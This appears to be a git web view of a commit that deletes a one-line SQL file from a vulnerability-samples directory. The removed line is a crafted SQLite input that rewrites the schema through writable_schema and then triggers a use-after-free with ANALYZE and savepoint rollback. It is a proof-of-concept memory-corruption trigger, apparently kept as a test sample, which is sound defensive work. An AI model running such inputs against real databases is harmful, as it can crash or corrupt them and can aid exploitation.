about summary refs log tree commit diff
path: root/docs/vuln_samples/sqlite-use-after-free.sql
diff options
context:
space:
mode:
Diffstat (limited to 'docs/vuln_samples/sqlite-use-after-free.sql')
-rw-r--r--docs/vuln_samples/sqlite-use-after-free.sql1
1 files changed, 0 insertions, 1 deletions
diff --git a/docs/vuln_samples/sqlite-use-after-free.sql b/docs/vuln_samples/sqlite-use-after-free.sql
deleted file mode 100644
index 4083ee64..00000000
--- a/docs/vuln_samples/sqlite-use-after-free.sql
+++ /dev/null
@@ -1 +0,0 @@
-create table t(s);PRAGMA writable_schema=ON;UPDATE sqlite_master SET sql='ANALYZE;CREATE VIRTUAL TABLE t USING fts3;DROP TABLE t;DROP TABLE EXISTS t';PRAGMA r;SAVEPOINT T;ANALYZE;ROLLBACK;SAVEPOINT E;DROP TABLE IF EXISTS t;